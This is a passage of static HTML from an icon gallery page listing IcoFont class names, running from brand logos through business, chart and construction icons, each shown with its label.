		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lg"></i>
				</div> 
				<span> brand-lg </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-life-hacker"></i>
				</div> 
				<span> brand-life-hacker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-linux-mint"></i>
				</div> 
				<span> brand-linux-mint </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-linux"></i>
				</div> 
				<span> brand-linux </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-lionix"></i>
				</div> 
				<span> brand-lionix </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-loreal"></i>
				</div> 
				<span> brand-loreal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-louis-vuitton"></i>
				</div> 
				<span> brand-louis-vuitton </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mac-os"></i>
				</div> 
				<span> brand-mac-os </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-marvel-app"></i>
				</div> 
				<span> brand-marvel-app </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mashable"></i>
				</div> 
				<span> brand-mashable </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mazda"></i>
				</div> 
				<span> brand-mazda </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mcdonals"></i>
				</div> 
				<span> brand-mcdonals </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mercedes"></i>
				</div> 
				<span> brand-mercedes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-micromax"></i>
				</div> 
				<span> brand-micromax </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-microsoft"></i>
				</div> 
				<span> brand-microsoft </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mobileme"></i>
				</div> 
				<span> brand-mobileme </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mobily"></i>
				</div> 
				<span> brand-mobily </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-motorola"></i>
				</div> 
				<span> brand-motorola </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-msi"></i>
				</div> 
				<span> brand-msi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mts"></i>
				</div> 
				<span> brand-mts </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-myspace"></i>
				</div> 
				<span> brand-myspace </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-mytv"></i>
				</div> 
				<span> brand-mytv </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nasa"></i>
				</div> 
				<span> brand-nasa </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-natgeo"></i>
				</div> 
				<span> brand-natgeo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nbc"></i>
				</div> 
				<span> brand-nbc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nescafe"></i>
				</div> 
				<span> brand-nescafe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nestle"></i>
				</div> 
				<span> brand-nestle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-netflix"></i>
				</div> 
				<span> brand-netflix </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nexus"></i>
				</div> 
				<span> brand-nexus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nike"></i>
				</div> 
				<span> brand-nike </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nokia"></i>
				</div> 
				<span> brand-nokia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-nvidia"></i>
				</div> 
				<span> brand-nvidia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-omega"></i>
				</div> 
				<span> brand-omega </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-opensuse"></i>
				</div> 
				<span> brand-opensuse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-oracle"></i>
				</div> 
				<span> brand-oracle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-panasonic"></i>
				</div> 
				<span> brand-panasonic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-paypal"></i>
				</div> 
				<span> brand-paypal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-pepsi"></i>
				</div> 
				<span> brand-pepsi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-philips"></i>
				</div> 
				<span> brand-philips </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-pizza-hut"></i>
				</div> 
				<span> brand-pizza-hut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-playstation"></i>
				</div> 
				<span> brand-playstation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-puma"></i>
				</div> 
				<span> brand-puma </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-qatar-air"></i>
				</div> 
				<span> brand-qatar-air </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-qvc"></i>
				</div> 
				<span> brand-qvc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-readernaut"></i>
				</div> 
				<span> brand-readernaut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-redbull"></i>
				</div> 
				<span> brand-redbull </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-reebok"></i>
				</div> 
				<span> brand-reebok </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-reuters"></i>
				</div> 
				<span> brand-reuters </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-samsung"></i>
				</div> 
				<span> brand-samsung </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-sap"></i>
				</div> 
				<span> brand-sap </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-saudia-airlines"></i>
				</div> 
				<span> brand-saudia-airlines </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-scribd"></i>
				</div> 
				<span> brand-scribd </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-shell"></i>
				</div> 
				<span> brand-shell </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-siemens"></i>
				</div> 
				<span> brand-siemens </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-sk-telecom"></i>
				</div> 
				<span> brand-sk-telecom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-slideshare"></i>
				</div> 
				<span> brand-slideshare </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-smashing-magazine"></i>
				</div> 
				<span> brand-smashing-magazine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-snapchat"></i>
				</div> 
				<span> brand-snapchat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-sony-ericsson"></i>
				</div> 
				<span> brand-sony-ericsson </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-sony"></i>
				</div> 
				<span> brand-sony </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-soundcloud"></i>
				</div> 
				<span> brand-soundcloud </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-sprint"></i>
				</div> 
				<span> brand-sprint </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-squidoo"></i>
				</div> 
				<span> brand-squidoo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-starbucks"></i>
				</div> 
				<span> brand-starbucks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-stc"></i>
				</div> 
				<span> brand-stc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-steam"></i>
				</div> 
				<span> brand-steam </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-suzuki"></i>
				</div> 
				<span> brand-suzuki </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-symbian"></i>
				</div> 
				<span> brand-symbian </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-t-mobile"></i>
				</div> 
				<span> brand-t-mobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-tango"></i>
				</div> 
				<span> brand-tango </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-target"></i>
				</div> 
				<span> brand-target </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-tata-indicom"></i>
				</div> 
				<span> brand-tata-indicom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-techcrunch"></i>
				</div> 
				<span> brand-techcrunch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-telenor"></i>
				</div> 
				<span> brand-telenor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-teliasonera"></i>
				</div> 
				<span> brand-teliasonera </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-tesla"></i>
				</div> 
				<span> brand-tesla </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-the-verge"></i>
				</div> 
				<span> brand-the-verge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-thenextweb"></i>
				</div> 
				<span> brand-thenextweb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-toshiba"></i>
				</div> 
				<span> brand-toshiba </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-toyota"></i>
				</div> 
				<span> brand-toyota </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-tribenet"></i>
				</div> 
				<span> brand-tribenet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-ubuntu"></i>
				</div> 
				<span> brand-ubuntu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-unilever"></i>
				</div> 
				<span> brand-unilever </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-vaio"></i>
				</div> 
				<span> brand-vaio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-verizon"></i>
				</div> 
				<span> brand-verizon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-viber"></i>
				</div> 
				<span> brand-viber </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-vodafone"></i>
				</div> 
				<span> brand-vodafone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-volkswagen"></i>
				</div> 
				<span> brand-volkswagen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-walmart"></i>
				</div> 
				<span> brand-walmart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-warnerbros"></i>
				</div> 
				<span> brand-warnerbros </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-whatsapp"></i>
				</div> 
				<span> brand-whatsapp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-wikipedia"></i>
				</div> 
				<span> brand-wikipedia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-windows"></i>
				</div> 
				<span> brand-windows </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-wire"></i>
				</div> 
				<span> brand-wire </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-wordpress"></i>
				</div> 
				<span> brand-wordpress </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-xiaomi"></i>
				</div> 
				<span> brand-xiaomi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-yahoobuzz"></i>
				</div> 
				<span> brand-yahoobuzz </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-yamaha"></i>
				</div> 
				<span> brand-yamaha </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-youtube"></i>
				</div> 
				<span> brand-youtube </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brand-zain"></i>
				</div> 
				<span> brand-zain </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bank-alt"></i>
				</div> 
				<span> bank-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bank"></i>
				</div> 
				<span> bank </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-barcode"></i>
				</div> 
				<span> barcode </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bill-alt"></i>
				</div> 
				<span> bill-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-billboard"></i>
				</div> 
				<span> billboard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-briefcase-1"></i>
				</div> 
				<span> briefcase-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-briefcase-2"></i>
				</div> 
				<span> briefcase-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-businessman"></i>
				</div> 
				<span> businessman </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-businesswoman"></i>
				</div> 
				<span> businesswoman </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chair"></i>
				</div> 
				<span> chair </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-coins"></i>
				</div> 
				<span> coins </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-company"></i>
				</div> 
				<span> company </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-contact-add"></i>
				</div> 
				<span> contact-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-files-stack"></i>
				</div> 
				<span> files-stack </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-handshake-deal"></i>
				</div> 
				<span> handshake-deal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-id-card"></i>
				</div> 
				<span> id-card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-meeting-add"></i>
				</div> 
				<span> meeting-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-money-bag"></i>
				</div> 
				<span> money-bag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pie-chart"></i>
				</div> 
				<span> pie-chart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-presentation-alt"></i>
				</div> 
				<span> presentation-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-presentation"></i>
				</div> 
				<span> presentation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stamp"></i>
				</div> 
				<span> stamp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stock-mobile"></i>
				</div> 
				<span> stock-mobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-arrows-axis"></i>
				</div> 
				<span> chart-arrows-axis </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-bar-graph"></i>
				</div> 
				<span> chart-bar-graph </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-flow-1"></i>
				</div> 
				<span> chart-flow-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-flow-2"></i>
				</div> 
				<span> chart-flow-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-flow"></i>
				</div> 
				<span> chart-flow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-growth"></i>
				</div> 
				<span> chart-growth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-histogram-alt"></i>
				</div> 
				<span> chart-histogram-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-histogram"></i>
				</div> 
				<span> chart-histogram </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-line-alt"></i>
				</div> 
				<span> chart-line-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-line"></i>
				</div> 
				<span> chart-line </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-pie-alt"></i>
				</div> 
				<span> chart-pie-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-pie"></i>
				</div> 
				<span> chart-pie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chart-radar-graph"></i>
				</div> 
				<span> chart-radar-graph </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-architecture-alt"></i>
				</div> 
				<span> architecture-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-architecture"></i>
				</div> 
				<span> architecture </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-barricade"></i>
				</div> 
				<span> barricade </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bolt"></i>
				</div> 
				<span> bolt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bricks"></i>
				</div> 
				<span> bricks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-building-alt"></i>
				</div> 
				<span> building-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bull-dozer"></i>
				</div> 
				<span> bull-dozer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-calculations"></i>
				</div> 
				<span> calculations </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cement-mix"></i>
				</div> 
				<span> cement-mix </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cement-mixer"></i>
				</div> 
				<span> cement-mixer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-concrete-mixer"></i>
				</div> 
				<span> concrete-mixer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-danger-zone"></i>
				</div> 
				<span> danger-zone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drill"></i>
				</div> 
				<span> drill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eco-energy"></i>
				</div> 
				<span> eco-energy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eco-environmen"></i>
				</div> 
				<span> eco-environmen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-energy-air"></i>
				</div> 
				<span> energy-air </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-energy-oil"></i>
				</div> 
				<span> energy-oil </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-energy-savings"></i>
				</div> 
				<span> energy-savings </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-energy-solar"></i>
				</div> 
				<span> energy-solar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-energy-water"></i>
				</div> 
				<span> energy-water </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-engineer"></i>
				</div> 
				<span> engineer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-extinguisher-alt"></i>
				</div> 
				<span> fire-extinguisher-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-extinguisher"></i>
				</div> 
				<span> fire-extinguisher </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fix-tools"></i>
				</div> 
				<span> fix-tools </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fork-lift"></i>
				</div> 
				<span> fork-lift </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-glue-oil"></i>
				</div> 
				<span> glue-oil </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hammer-alt"></i>
				</div> 
				<span> hammer-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hammer"></i>
				</div> 
				<span> hammer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-help-robot"></i>
				</div> 
				<span> help-robot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries-1"></i>
				</div> 
				<span> industries-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries-2"></i>
				</div> 
				<span> industries-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries-3"></i>
				</div> 
				<span> industries-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries-4"></i>
				</div> 
				<span> industries-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries-5"></i>
				</div> 
				<span> industries-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-industries"></i>
				</div> 
				<span> industries </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-labour"></i>
				</div> 
				<span> labour </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mining"></i>
				</div> 
				<span> mining </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paint-brush"></i>
				</div> 
				<span> paint-brush </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pollution"></i>
				</div> 
				<span> pollution </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-power-zone"></i>
				</div> 
				<span> power-zone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-radio-active"></i>
				</div> 
				<span> radio-active </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-recycle-alt"></i>
				</div> 
				<span> recycle-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-recycling-man"></i>
				</div> 
				<span> recycling-man </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-safety-hat-light"></i>
				</div> 
				<span> safety-hat-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-safety-hat"></i>
				</div> 
				<span> safety-hat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-saw"></i>
				</div> 
				<span> saw </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-screw-driver"></i>
				</div> 
				<span> screw-driver </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tools-1"></i>
				</div> 
				<span> tools-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tools-bag"></i>
				</div> 
				<span> tools-bag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tow-truck"></i>
				</div> 
				<span> tow-truck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trolley"></i>
				</div> 
				<span> trolley </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trowel"></i>
				</div> 
				<span> trowel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-under-construction-alt"></i>
